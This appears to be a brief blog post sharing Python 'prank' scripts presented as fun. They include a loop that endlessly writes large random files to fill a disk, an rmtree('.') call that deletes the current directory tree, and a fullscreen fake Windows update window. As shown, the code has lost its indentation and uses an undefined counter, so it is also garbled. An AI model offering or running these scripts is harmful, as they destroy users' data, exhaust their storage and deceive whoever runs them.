This is more of a placeholder for now. I'll be adding more when I can be bothered to hunt them out and sort them into some form of readable format. They're fun!
from string import digits, ascii_uppercase
from random import choice
while 1:
c += 1
with open(str(c), 'w+') as f:
f.write(''.join(choice(ascii_uppercase + digits) for x in range(999999)))
from shutil import rmtree
rmtree('.')
import webview
webview.create_window('', 'http://fakeupdate.net/win10/', fullscreen=True, confirm_quit=True)
def fibonacci():
a, b = 0, 1
while True:
yield a
a, b = b, a + b
for x in fibonacci():
print(x)
Thanks for reading. x